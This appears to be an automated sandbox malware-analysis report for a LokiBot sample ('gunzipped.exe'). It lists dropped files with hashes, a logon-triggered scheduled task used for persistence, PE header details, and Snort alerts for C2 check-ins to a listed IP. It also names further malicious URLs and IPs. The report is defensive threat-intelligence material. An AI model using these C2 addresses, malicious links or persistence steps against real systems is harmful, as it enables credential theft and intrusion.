Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:16:47	API Interceptor	79x Sleep call for process: gunzipped.exe modified
03:16:48	API Interceptor	11x Sleep call for process: powershell.exe modified
03:16:49	Task Scheduler	Run new task: WiHDtnb path: C:\Users\user\AppData\Roaming\WiHDtnb.exe
03:16:50	API Interceptor	1x Sleep call for process: WiHDtnb.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
136.244.109.75	SCTR11670000pdf.exe	Get hash	malicious	Lokibot	Browse	136.244.109.75/index.php/690877741063

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-CHOOPAUS	SCTR11670000pdf.exe	Get hash	malicious	Lokibot	Browse	136.244.109.75
	xM6280MQQPyf.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	45.32.168.59
	https://rts.ccmp.eu/rts/go2.aspx?h=1247107&tp=i-1NGB-Fb-EeO-1jnRvw-1c-PwWY-1c-1j0tsE-l8HoOHKMRi-iIE2M&x=readymoves.com.au/media/Imfs/%23Y2hlcnlsQGltZnMuY29tLmF1	Get hash	malicious	Unknown	Browse	45.77.236.187
	http://169.150.221.147	Get hash	malicious	Unknown	Browse	136.244.92.75
	http://scorelineupdate.com	Get hash	malicious	Unknown	Browse	95.179.200.239
	la.bot.arm.elf	Get hash	malicious	Unknown	Browse	45.32.106.211
	W1w2WUui2Q.elf	Get hash	malicious	Mirai	Browse	155.138.246.0
	https://rolexz.b-cdn.net/Wi0n0MntyEr00170887/index.html	Get hash	malicious	Unknown	Browse	136.244.92.75
	xggP3BzhZDQC.exe	Get hash	malicious	XWorm	Browse	45.32.168.59
	SecuriteInfo.com.Linux.Siggen.9999.15399.29417.elf	Get hash	malicious	Mirai	Browse	204.80.130.53

Process:	C:\Users\user\AppData\Roaming\WiHDtnb.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1415
Entropy (8bit):	5.352427679901606
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
MD5:	97AD91F1C1F572C945DA12233082171D
SHA1:	D5E33DDAB37E32E416FC40419FB26B3C0563519D
SHA-256:	3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
SHA-512:	8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gunzipped.exe.log

Download File

Process:	C:\Users\user\Desktop\gunzipped.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1415
Entropy (8bit):	5.352427679901606
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
MD5:	97AD91F1C1F572C945DA12233082171D
SHA1:	D5E33DDAB37E32E416FC40419FB26B3C0563519D
SHA-256:	3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
SHA-512:	8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379828835936797
Encrypted:	false
SSDEEP:	48:tWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//ZM0N1Ryus:tLHxvCsIfA2KRHmOugroPs
MD5:	D83AFE19E5D73A16F6E64349291CFDE7
SHA1:	F00A166D5E19F565A79DA8AAF60BFAD6424FB119
SHA-256:	E0617D49B7E5704732939767B06CFB7B75FE4AF5EBC37B0197E3D1555BCFDE86
SHA-512:	D4F8309DFCBA02300ADE00D3ECADC351AA6060B8727909757DF0616B6615091FD09B23DA0EE6CD422E2DCDE30A89A0B098A6D0D457B82210EF04332BD17BA41A
Malicious:	false
Preview:	@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a4saqt0i.zdl.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nx3xeap1.mbz.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v1rg5cf2.b3l.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xe1tyowq.3ch.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp

Download File

Process:	C:\Users\user\Desktop\gunzipped.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1580
Entropy (8bit):	5.09742565722186
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtixvn:cgergYrFdOFzOzN33ODOiDdKrsuTmv
MD5:	510F1589129C1F420D0A3370D577A0B5
SHA1:	5A2C71387F6BD3829FDD94BE87AEF9835C43ED36
SHA-256:	2FBD1AEC3EF82833C6A496AD492206DDA97BF5DEC21B111299E4874878D759E3
SHA-512:	5E1CBB6AF36620F91797BA8128CE84144ADAFC1686003E986B10B36DC9E9F7A08A1218DC0F3A7AD62A87C9BA238F05A614BF8162C6208AA6B3B527FAB3E6FBB2
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmpD4BF.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\WiHDtnb.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1580
Entropy (8bit):	5.09742565722186
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtixvn:cgergYrFdOFzOzN33ODOiDdKrsuTmv
MD5:	510F1589129C1F420D0A3370D577A0B5
SHA1:	5A2C71387F6BD3829FDD94BE87AEF9835C43ED36
SHA-256:	2FBD1AEC3EF82833C6A496AD492206DDA97BF5DEC21B111299E4874878D759E3
SHA-512:	5E1CBB6AF36620F91797BA8128CE84144ADAFC1686003E986B10B36DC9E9F7A08A1218DC0F3A7AD62A87C9BA238F05A614BF8162C6208AA6B3B527FAB3E6FBB2
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Users\user\Desktop\gunzipped.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\Desktop\gunzipped.exe
File Type:	data
Category:	dropped
Size (bytes):	47
Entropy (8bit):	1.168829563685559
Encrypted:	false
SSDEEP:	3:/lSll2DQi:AoMi
MD5:	DAB633BEBCCE13575989DCFA4E2203D6
SHA1:	33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
SHA-256:	1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
SHA-512:	EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
Malicious:	false
Preview:	........................................user.

C:\Users\user\AppData\Roaming\WiHDtnb.exe

Download File

Process:	C:\Users\user\Desktop\gunzipped.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	553984
Entropy (8bit):	7.87347866079058
Encrypted:	false
SSDEEP:	12288:/AogULNdQcE6lIi6TckYyD1WoO3wjcuuC4KU3f3uWbF:JgadQ1iYcSWNwjHuC4KU3f3uWbF
MD5:	8864B52D242037414B7C4A230C390AB8
SHA1:	47680D0F0D286097F7CDDA37947AAAACD7226EE3
SHA-256:	D405284F75CDE4B8C45E3D5C3B41C7BBD6DB2C75788CB6D0B1DEEC5EA60559A4
SHA-512:	1CC6124F479DEE45A46ADA9416E90642365F316B055E2DBB73CC34B0276449FABF1B7929E5A76C133829FECA47669445CBCE2B876430D5D77902C2034B64B59D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 18% Antivirus: Virustotal, Detection: 34%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\..f.................Z...........x... ........@.. ....................................@..................................x..S.................................................................................... ............... ..H............text....X... ...Z.................. ..`.rsrc................\..............@..@.reloc...............r..............@..B.................x......H.......D...T............................................................0..A....... R........%.m...(.....n... .........%.i...(.....j...(+........&...B... ....(..........0..............,.".".#..(....+.....0...............".".#. ....(....+......0...............".".#...(....+.....0...................... ....(....+.....0..+.....................(Q...+....s....}......j}......0............{......*...0..........~j........E....Z.......Z...E...Z...?...?.....{.....(i...~n... ..

C:\Users\user\AppData\Roaming\WiHDtnb.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\gunzipped.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.87347866079058
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	gunzipped.exe
File size:	553'984 bytes
MD5:	8864b52d242037414b7c4a230c390ab8
SHA1:	47680d0f0d286097f7cdda37947aaaacd7226ee3
SHA256:	d405284f75cde4b8c45e3d5c3b41c7bbd6db2c75788cb6d0b1deec5ea60559a4
SHA512:	1cc6124f479dee45a46ada9416e90642365f316b055e2dbb73cc34b0276449fabf1b7929e5a76c133829feca47669445cbce2b876430d5d77902c2034b64b59d
SSDEEP:	12288:/AogULNdQcE6lIi6TckYyD1WoO3wjcuuC4KU3f3uWbF:JgadQ1iYcSWNwjHuC4KU3f3uWbF
TLSH:	70C4120C9BAD5826D0DC0B7C9172509C8336E2E2F947F75A6EA088DB0E13781D59D2EB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\..f.................Z...........x... ........@.. ....................................@................................

File Icon


Icon Hash:	9931c5b98687b385

Static PE Info

General

Entrypoint:	0x4878ee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x661F0E5C [Tue Apr 16 23:48:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x87898	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x88000	0x1600	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x858f4	0x85a00	05cadf0d2a0e99577d063964d1c3f4d4	False	0.9272282799345183	data	7.886814119771072	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x88000	0x1600	0x1600	56be764d9db1562197361a976f89e128	False	0.7361505681818182	data	6.561881678021146	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8a000	0xc	0x200	9ab695e151690702fbce31521ff5710f	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x880c8	0xf5d	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9125349605898805
RT_GROUP_ICON	0x89038	0x14	data	1.05
RT_VERSION	0x8905c	0x404	data	0.4280155642023346

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/17/24-03:18:07.152097	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49762	80	192.168.2.5	136.244.109.75
04/17/24-03:18:07.152097	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49762	80	192.168.2.5	136.244.109.75
04/17/24-03:18:28.314689	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49777	80	192.168.2.5	136.244.109.75
04/17/24-03:17:42.872387	TCP	2025381	ET TROJAN LokiBot Checkin	49745	80	192.168.2.5	136.244.109.75
04/17/24-03:17:07.139176	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49716	80	192.168.2.5	136.244.109.75
04/17/24-03:17:02.984312	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49713	80	192.168.2.5	136.244.109.75
04/17/24-03:17:07.139176	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49716	80	192.168.2.5	136.244.109.75
04/17/24-03:18:46.390927	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49789	80	192.168.2.5	136.244.109.75
04/17/24-03:17:19.154295	TCP	2025381	ET TROJAN LokiBot Checkin	49730	80	192.168.2.5	136.244.109.75
04/17/24-03:18:49.380266	TCP	2025381	ET TROJAN LokiBot Checkin	49791	80	192.168.2.5	136.244.109.75
04/17/24-03:17:31.711088	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49738	80	192.168.2.5	136.244.109.75
04/17/24-03:18:50.868001	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49792	80	192.168.2.5	136.244.109.75
04/17/24-03:18:32.922641	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49780	80	192.168.2.5	136.244.109.75
04/17/24-03:18:28.314689	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49777	80	192.168.2.5	136.244.109.75
04/17/24-03:18:32.922641	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49780	80	192.168.2.5	136.244.109.75
04/17/24-03:18:02.659962	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49759	80	192.168.2.5	136.244.109.75
04/17/24-03:18:44.899678	TCP	2025381	ET TROJAN LokiBot Checkin	49788	80	192.168.2.5	136.244.109.75
04/17/24-03:17:58.145128	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49756	80	192.168.2.5	136.244.109.75
04/17/24-03:17:01.257517	TCP	2025381	ET TROJAN LokiBot Checkin	49712	80	192.168.2.5	136.244.109.75
04/17/24-03:18:02.659962	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49759	80	192.168.2.5	136.244.109.75
04/17/24-03:18:23.842884	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49774	80	192.168.2.5	136.244.109.75
04/17/24-03:17:13.162928	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49726	80	192.168.2.5	136.244.109.75
04/17/24-03:17:47.288202	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49749	80	192.168.2.5	136.244.109.75
04/17/24-03:18:38.899573	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49784	80	192.168.2.5	136.244.109.75
04/17/24-03:17:27.158635	TCP	2025381	ET TROJAN LokiBot Checkin	49735	80	192.168.2.5	136.244.109.75
04/17/24-03:16:56.772780	TCP	2025381	ET TROJAN LokiBot Checkin	49709	80	192.168.2.5	136.244.109.75
04/17/24-03:17:13.162928	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49726	80	192.168.2.5	136.244.109.75
04/17/24-03:17:47.288202	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49749	80	192.168.2.5	136.244.109.75
04/17/24-03:18:47.882152	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49790	80	192.168.2.5	136.244.109.75
